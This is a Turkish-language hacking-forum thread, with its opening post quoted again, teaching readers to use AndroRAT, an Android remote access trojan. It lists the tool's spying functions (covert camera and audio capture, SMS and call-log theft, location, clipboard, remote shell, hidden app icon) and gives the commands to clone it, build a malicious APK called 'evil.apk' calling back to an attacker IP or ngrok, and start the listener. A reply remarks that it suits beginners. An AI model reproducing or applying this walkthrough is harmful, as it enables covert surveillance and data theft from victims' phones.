exploit paylaşım grubumuz: t.me/HTTPwnn

ANDRORAT nedir nasil kullanilir? ANDRORAT

  • Konu başlatıcı Konu başlatıcı Shizo
  • Başlangıç Tarihi Başlangıç Tarihi

Shizo

WarNight Member
Katılım
17 Haz 2026
Mesaj
23
Reaksiyon
50
Puan
13
xentr_thread_starter
selam arkadassaklar bugün encok bilinen bir adet androit rati yani androrat hakkinda konusucaz ve nasil kullnicaginizi ögretecem owye

AndroRAT Nedir ve Ne İşe Yarar?​

  • Nedir: İstemci tarafında Java (Android uygulaması), sunucu tarafında ise Python kullanılan bir araçtır. Android cihazlar üzerinde tam yetkili bir arka kapı (backdoor) oluşturmak için kullanılır.
  • Ne İşe Yarar:Bir cihazın kontrolünü ele geçirmeye ve cihazdaki verileri uzaktan çekmeye yarar. Özellikleri arasında şunlar yer alır:
    • Kamera ve Ses: Uzaktan fotoğraf çekebilir, video ve ses kaydı yapabilir.
    • Veri Erişimi: SMS kayıtlarını, arama kayıtlarını, kişi listesini ve panodaki (clipboard) verileri alabilir.
    • Konum ve Cihaz Bilgisi: GPS konumunu, IP adresini, MAC adresini, SIM kart detaylarını ve cihaz bilgilerini toplayabilir.
    • Dosya Yönetimi: Cihazdan dosya indirebilir veya cihaza dosya yükleyebilir.
    • Gizlilik: Uygulama yüklendikten sonra simgesi gizlenebilir ve arka planda sürekli çalışacak şekilde ayarlanabilir.


      yani cektigi seyler



    • deviceInfo --> returns basic info of the device
      camList --> returns cameraID
      takepic [cameraID] --> Takes picture from camera
      startVideo [cameraID] --> starts recording the video
      stopVideo --> stop recording the video and return the video file
      startAudio --> starts recording the audio
      stopAudio --> stop recording the audio
      getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
      getCallLogs --> returns call logs in a file
      shell --> starts a sh shell of the device
      vibrate [number_of_times] --> vibrate the device number of time
      getLocation --> return the current location of the device
      getIP --> returns the ip of the device
      getSimDetails --> returns the details of all sim of the device
      clear --> clears the screen
      getClipData --> return the current saved text from the clipboard
      getMACAddress --> returns the mac address of the device
      exit --> exit the interpreter



      kullanimi budir


    • git clone https://github.com/karma9874/AndroRAT.git
      cd AndroRAT
      pip install -r requirements.txt1783166181793.png
sonrada böyle örnek olarak olusturulabilir



1783166203644.png

  • To build the apk using ngrok which will also set the listner: python3 androRAT.py --build --ngrok -o evil.apk
  • To build the apk using desired ip and port: python3 androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk
  • To get the interpreter: python3 androRAT.py --shell -i 0.0.0.0 -p 8000

    böyledir iyi forumlar dilerim
 
Son düzenleyen: bir moderatör:
selam arkadassaklar bugün encok bilinen bir adet androit rati yani androrat hakkinda konusucaz ve nasil kullnicaginizi ögretecem owye

AndroRAT Nedir ve Ne İşe Yarar?​

  • Nedir: İstemci tarafında Java (Android uygulaması), sunucu tarafında ise Python kullanılan bir araçtır. Android cihazlar üzerinde tam yetkili bir arka kapı (backdoor) oluşturmak için kullanılır.
  • Ne İşe Yarar:Bir cihazın kontrolünü ele geçirmeye ve cihazdaki verileri uzaktan çekmeye yarar. Özellikleri arasında şunlar yer alır:
    • Kamera ve Ses: Uzaktan fotoğraf çekebilir, video ve ses kaydı yapabilir.
    • Veri Erişimi: SMS kayıtlarını, arama kayıtlarını, kişi listesini ve panodaki (clipboard) verileri alabilir.
    • Konum ve Cihaz Bilgisi: GPS konumunu, IP adresini, MAC adresini, SIM kart detaylarını ve cihaz bilgilerini toplayabilir.
    • Dosya Yönetimi: Cihazdan dosya indirebilir veya cihaza dosya yükleyebilir.
    • Gizlilik: Uygulama yüklendikten sonra simgesi gizlenebilir ve arka planda sürekli çalışacak şekilde ayarlanabilir.


      yani cektigi seyler



    • deviceInfo --> returns basic info of the device
      camList --> returns cameraID
      takepic [cameraID] --> Takes picture from camera
      startVideo [cameraID] --> starts recording the video
      stopVideo --> stop recording the video and return the video file
      startAudio --> starts recording the audio
      stopAudio --> stop recording the audio
      getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
      getCallLogs --> returns call logs in a file
      shell --> starts a sh shell of the device
      vibrate [number_of_times] --> vibrate the device number of time
      getLocation --> return the current location of the device
      getIP --> returns the ip of the device
      getSimDetails --> returns the details of all sim of the device
      clear --> clears the screen
      getClipData --> return the current saved text from the clipboard
      getMACAddress --> returns the mac address of the device
      exit --> exit the interpreter



      kullanimi budir


    • git clone https://github.com/karma9874/AndroRAT.git
      cd AndroRAT
      pip install -r requirements.txtEk dosyayı görüntüle: 356
sonrada böyle örnek olarak olusturulabilir



Ek dosyayı görüntüle: 357

  • To build the apk using ngrok which will also set the listner: python3 androRAT.py --build --ngrok -o evil.apk
  • To build the apk using desired ip and port: python3 androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk
  • To get the interpreter: python3 androRAT.py --shell -i 0.0.0.0 -p 8000

    böyledir iyi forumlar dilerim
  • *** Hidden text: cannot be quoted. ***
Playprotect çoktan patlatmıştır bunu ve erişilebilirlik izni istemiyorsa 12 iznin hepsini de teker teker onaylatıyordur onun dışında yeni başlayanlar için idare eder e.s
 
Geri
En Üst